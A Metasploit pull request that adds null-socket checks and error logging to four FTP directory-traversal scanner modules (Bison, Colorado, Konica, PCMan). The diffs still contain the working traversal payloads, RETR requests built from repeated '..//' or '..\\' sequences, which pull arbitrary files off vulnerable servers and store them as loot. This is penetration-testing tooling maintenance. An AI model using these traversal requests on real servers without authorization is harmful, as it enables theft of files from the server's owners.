### PR TITLE
Fix ftp traversal error conditions

### DIFF
--- a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
@@ -61,31 +61,45 @@ class MetasploitModule < Msf::Auxiliary
       connect_login
       sock = data_connect
 
-      file_path = datastore['PATH']
-      file = ::File.basename(file_path)
+      # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
+      # and  #7582
+      if sock.nil?
+        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+        print_status(error_msg)
+        elog(error_msg)
+      else
+        file_path = datastore['PATH']
+        file = ::File.basename(file_path)
 
-      # make RETR request and store server response message...
-      retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
-      res = send_cmd( ["RETR", retr_cmd])
+        # make RETR request and store server response message...
+        retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
+        res = send_cmd( ["RETR", retr_cmd])
 
-      # read the file data from the socket that we opened
-      response_data = sock.read(1024)
+        # read the file data from the socket that we opened
+        # dont assume theres still a sock to read from. Per #7582
+        if sock.nil?
+          return
+        else
+          # read the file data from the socket that we opened
+          response_data = sock.read(1024)
+        end
 
-      unless response_data
-        print_error("#{file} not found")
-        return
+        unless response_data
+          print_error("#{file} not found")
+          return
+        end
+
+        if response_data.length == 0
+          print_status("File (#{file_path})from #{peer} is empty...")
+          return
+        end
+
+        # store file data to loot
+        loot_file = store_loot("bisonware.ftp.data", "text", rhost, response_data, file, file_path)
+        vprint_status("Data returned:\n")
+        vprint_line(response_data)
+        print_good("Stored #{file_path} to #{loot_file}")
       end
-
-      if response_data.length == 0
-        print_status("File (#{file_path})from #{peer} is empty...")
-        return
-      end
-
-      # store file data to loot
-      loot_file = store_loot("bisonware.ftp.data", "text", rhost, response_data, file, file_path)
-      vprint_status("Data returned:\n")
-      vprint_line(response_data)
-      print_good("Stored #{file_path} to #{loot_file}")
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
       vprint_error(e.message)

--- a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
@@ -78,6 +78,9 @@ class MetasploitModule < Msf::Auxiliary
         # read the file data from the socket that we opened
         # dont assume theres still a sock to read from. Per #7582
         if sock.nil?
+          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+          print_status(error_msg)
+          elog(error_msg)
           return
         else
           # read the file data from the socket that we opened

--- a/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Auxiliary
         retr_cmd = '\\\\\\' + ("..\\" * datastore['DEPTH'] ) + "#{file_path}"
         res = send_cmd( ["retr", retr_cmd], true)
         print_status(res)
-        
+
         # dont assume theres still a sock to read from. Per #7582
         if sock.nil?
           return
@@ -86,17 +86,17 @@ class MetasploitModule < Msf::Auxiliary
           # read the file data from the socket that we opened
           response_data = sock.read(1024)
         end
-  
+
         unless response_data
           print_error("#{file} not found")
           return
         end
-  
+
         if response_data.length == 0
           print_status("File (#{file_path})from #{peer} is empty...")
           return
         end
-  
+
         # store file data to loot
         loot_file = store_loot("coloradoftp.ftp.data", "text", rhost, response_data, file, file_path)
         vprint_status("Data returned:\n")

--- a/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb
@@ -64,31 +64,45 @@ class MetasploitModule < Msf::Auxiliary
       connect_login
       sock = data_connect
 
-      file_path = datastore['PATH']
-      file = ::File.basename(file_path)
+      # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
+      # and  #7582
+      if sock.nil?
+        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+        print_status(error_msg)
+        elog(error_msg)
+      else
+        file_path = datastore['PATH']
+        file = ::File.basename(file_path)
 
-      # make RETR request and store server response message...
-      retr_cmd = '\\\\\\' + ("..\\" * datastore['DEPTH'] ) + "#{file_path}"
-      res = send_cmd( ["retr", retr_cmd], true)
-      print_status(res)
-      # read the file data from the socket that we opened
-      response_data = sock.read(1024)
-
-      unless response_data
-        print_error("#{file} not found")
-        return
+        # make RETR request and store server response message...
+        retr_cmd = '\\\\\\' + ("..\\" * datastore['DEPTH'] ) + "#{file_path}"
+        res = send_cmd( ["retr", retr_cmd], true)
+        print_status(res)
+        
+        # dont assume theres still a sock to read from. Per #7582
+        if sock.nil?
+          return
+        else
+          # read the file data from the socket that we opened
+          response_data = sock.read(1024)
+        end
+  
+        unless response_data
+          print_error("#{file} not found")
+          return
+        end
+  
+        if response_data.length == 0
+          print_status("File (#{file_path})from #{peer} is empty...")
+          return
+        end
+  
+        # store file data to loot
+        loot_file = store_loot("coloradoftp.ftp.data", "text", rhost, response_data, file, file_path)
+        vprint_status("Data returned:\n")
+        vprint_line(response_data)
+        print_good("Stored #{file_path} to #{loot_file}")
       end
-
-      if response_data.length == 0
-        print_status("File (#{file_path})from #{peer} is empty...")
-        return
-      end
-
-      # store file data to loot
-      loot_file = store_loot("coloradoftp.ftp.data", "text", rhost, response_data, file, file_path)
-      vprint_status("Data returned:\n")
-      vprint_line(response_data)
-      print_good("Stored #{file_path} to #{loot_file}")
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
       vprint_error(e.message)

--- a/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb
@@ -81,6 +81,9 @@ class MetasploitModule < Msf::Auxiliary
 
         # dont assume theres still a sock to read from. Per #7582
         if sock.nil?
+          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+          print_status(error_msg)
+          elog(error_msg)
           return
         else
           # read the file data from the socket that we opened

--- a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb
@@ -62,31 +62,43 @@ class MetasploitModule < Msf::Auxiliary
       # Login anonymously and open the socket that we'll use for data retrieval.
       connect_login
       sock = data_connect
-      file_path = datastore['PATH']
-      file = ::File.basename(file_path)
+      if sock.nil?
+        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+        print_status(error_msg)
+        elog(error_msg)
+      else
+        file_path = datastore['PATH']
+        file = ::File.basename(file_path)
 
-      # make RETR request and store server response message...
-      retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
-      res = send_cmd( ["RETR", retr_cmd])
+        # make RETR request and store server response message...
+        retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
+        res = send_cmd( ["RETR", retr_cmd])
 
-      # read the file data from the socket that we opened
-      response_data = sock.read(1024)
+        # read the file data from the socket that we opened
+        # dont assume theres still a sock to read from. Per #7582
+        if sock.nil?
+          return
+        else
+          # read the file data from the socket that we opened
+          response_data = sock.read(1024)
+        end
 
-      unless response_data
-        print_error("#{file_path} not found")
-        return
+        unless response_data
+          print_error("#{file_path} not found")
+          return
+        end
+
+        if response_data.length == 0 or ! (res =~ /^150/ )
+          print_status("File (#{file_path})from #{peer} is empty...")
+          return
+        end
+
+        # store file data to loot
+        loot_file = store_loot("konica.ftp.data", "text", rhost, response_data, file, file_path)
+        vprint_status("Data returned:\n")
+        vprint_line(response_data)
+        print_good("Stored #{file_path} to #{loot_file}")
       end
-
-      if response_data.length == 0 or ! (res =~ /^150/ )
-        print_status("File (#{file_path})from #{peer} is empty...")
-        return
-      end
-
-      # store file data to loot
-      loot_file = store_loot("konica.ftp.data", "text", rhost, response_data, file, file_path)
-      vprint_status("Data returned:\n")
-      vprint_line(response_data)
-      print_good("Stored #{file_path} to #{loot_file}")
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
       vprint_error(e.message)

--- a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb
@@ -77,6 +77,9 @@ class MetasploitModule < Msf::Auxiliary
         # read the file data from the socket that we opened
         # dont assume theres still a sock to read from. Per #7582
         if sock.nil?
+          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+          print_status(error_msg)
+          elog(error_msg)
           return
         else
           # read the file data from the socket that we opened

--- a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb
@@ -75,6 +75,9 @@ class MetasploitModule < Msf::Auxiliary
         # read the file data from the socket that we opened
         # dont assume theres still a sock to read from. Per #7582
         if sock.nil?
+          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+          print_status(error_msg)
+          elog(error_msg)
           return
         else
           # read the file data from the socket that we opened

--- a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb
@@ -60,31 +60,43 @@ class MetasploitModule < Msf::Auxiliary
       # Login anonymously and open the socket that we'll use for data retrieval.
       connect_login
       sock = data_connect
-      file_path = datastore['PATH']
-      file = ::File.basename(file_path)
+      if sock.nil?
+        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
+        print_status(error_msg)
+        elog(error_msg)
+      else
+        file_path = datastore['PATH']
+        file = ::File.basename(file_path)
 
-      # make RETR request and store server response message...
-      retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
-      res = send_cmd( ["RETR", retr_cmd])
+        # make RETR request and store server response message...
+        retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
+        res = send_cmd( ["RETR", retr_cmd])
 
-      # read the file data from the socket that we opened
-      response_data = sock.read(1024)
+        # read the file data from the socket that we opened
+        # dont assume theres still a sock to read from. Per #7582
+        if sock.nil?
+          return
+        else
+          # read the file data from the socket that we opened
+          response_data = sock.read(1024)
+        end
 
-      unless response_data
-        print_error("#{file_path} not found")
-        return
+        unless response_data
+          print_error("#{file_path} not found")
+          return
+        end
+
+        if response_data.length == 0 or ! (res =~ /^150/ )
+          print_status("File (#{file_path})from #{peer} is empty...")
+          return
+        end
+
+        # store file data to loot
+        loot_file = store_loot("pcman.ftp.data", "text", rhost, response_data, file, file_path)
+        vprint_status("Data returned:\n")
+        vprint_line(response_data)
+        print_good("Stored #{file_path} to #{loot_file}")
       end
-
-      if response_data.length == 0 or ! (res =~ /^150/ )
-        print_status("File (#{file_path})from #{peer} is empty...")
-        return
-      end
-
-      # store file data to loot
-      loot_file = store_loot("pcman.ftp.data", "text", rhost, response_data, file, file_path)
-      vprint_status("Data returned:\n")
-      vprint_line(response_data)
-      print_good("Stored #{file_path} to #{loot_file}")
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
       vprint_error(e.message)


### PR DESCRIPTION
Fixes #7582 by checking if `sock` exists before sending data over it, or reading from it.  This is a combined solution by @h00die and @bwatters-r7 and was confirmed as a fix in the original ticket by @jinq102030.

## Verification

You'll want to run these against a NON-vulnerable version (like iis ftp, or vsftp)

- [ ] Start `msfconsole`
- [ ] `use modules/auxiliary/scanner/ftp/bison_ftp_traversal`
- [ ] set rhosts
- [ ] `scan`
- [ ] repeat for colorado, konica, pcman

